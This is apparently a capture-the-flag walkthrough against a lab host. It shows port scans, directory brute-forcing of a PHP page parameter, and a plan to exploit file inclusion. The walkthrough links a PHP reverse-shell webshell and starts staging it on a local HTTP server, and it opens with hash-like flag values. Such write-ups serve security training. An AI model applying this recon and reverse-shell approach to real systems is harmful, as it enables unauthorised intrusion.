e335462da856f39997bffdc04b8d89ce1104fcc5
2b0286a69b276189afe50517304963e5fa5982d9
rustscan -a 10.150.150.18
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
nmap -sC -sV 10.150.150.18 -p 22,80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 2f:0e:73:d4:ae:73:14:7e:c5:1c:15:84:ef:45:a4:d1 (RSA)
| 256 39:0b:0b:c9:86:c9:8e:b5:2b:0c:39:c7:63:ec:e2:10 (ECDSA)
|_ 256 f6:bf:c5:03:5b:df:e5:e1:f4:da:ac:1e:b2:07:88:2f (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-title: Welcome to my homepage!
|_Requested resource was /index.php?page=home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster dir -u 10.150.150.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 500 -q
/includes (Status: 301) [Size: 317] [--> <http://10.150.150.18/includes/>]
Navigate to http://10.150.150.18/includes/
Since when you go to 10.150.150.18 it auto directs you to /index.php?page=home , it might be a good idea to dirb the pages.
dirb <http://10.150.150.18/index.php?page=>
---- Scanning URL: <http://10.150.150.18/index.php?page=> ----
+ <http://10.150.150.18/index.php?page=about> (CODE:200|SIZE:1955)
+ <http://10.150.150.18/index.php?page=about_us> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=aboutus> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=about-us> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=cgi-home> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contact> (CODE:200|SIZE:1900)
+ <http://10.150.150.18/index.php?page=contact_bean> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contact_us> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contact-form> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contactinfo> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contacto> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contacts> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contactus> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=contact-us> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=home> (CODE:200|SIZE:1905)
+ <http://10.150.150.18/index.php?page=homepage> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=homes> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=homework> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=index> (CODE:200|SIZE:11110836)
+ <http://10.150.150.18/index.php?page=myhomework> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=nethome> (CODE:200|SIZE:959)
+ <http://10.150.150.18/index.php?page=sucontact> (CODE:200|SIZE:959)
There is a weird one on /index.php?page=index because of the oversized
+ <http://10.150.150.18/index.php?page=index> (CODE:200|SIZE:11110836)
https://owasp.org/www-community/attacks/Path_Traversal
Since the website is using PHP and it has a very very big file in the webpage, we assume it might including its whole operating system. Try to see if there is any LFI / RFI or File Path Traversal
First we make get the php_reverse_shell from https://github.com/tutorial0/WebShell/blob/master/Php/php-reverse-shell.php
Then we setup our Python HTTP Server at 8000